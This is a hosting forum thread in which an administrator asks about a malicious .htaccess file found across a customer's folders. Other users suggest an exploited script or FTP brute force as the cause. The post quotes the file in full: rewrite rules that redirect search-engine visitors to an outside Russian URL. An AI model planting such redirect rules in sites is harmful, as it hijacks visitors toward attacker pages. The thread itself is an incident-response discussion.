Strange .htaccess file in public_html

S

splitech

Verified User
Joined
Sep 28, 2004
Messages
47
Customer just called site was not working, being re-directed to an attached hacker site?. We found this .htaccess file in just about every folder. Can you please advise how it got there or?

RewriteEngine On
Options +FollowSymlinks
RewriteBase /
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://gpt0.ru/in.cgi?3 [R=301,L]
 
You must have an insecure script that allows writing to the folder.
 
What user owns the file? What were the permissions on the folders it was in?
 
"We found this .htaccess file in just about every folder"

Are you referring to just one domain ONLY (subfolders within the public_html of that domain) ?
 
rohit said:
"We found this .htaccess file in just about every folder"

Are you referring to just one domain ONLY (subfolders within the public_html of that domain) ?
Click to expand...


Just one user has this problem, the files are owned by user.user

This seems like somehow a script is being exploited and allowing someone to write these changes to this .htaccess file. This file was found with those settings and the redirect to that url in /home/user /home/user/public_html
 
If the .htaccess files are owned by the user, then the exploited script is also owned by the user.

So for better or worse, depending on how you look at it, it's the user's issue.

Jeff
 
i would suggest you to change the Password for this user. there are generally a lot of FTP Brute force attacks on the servers.
 
You must log in or register to reply here.
Back
Top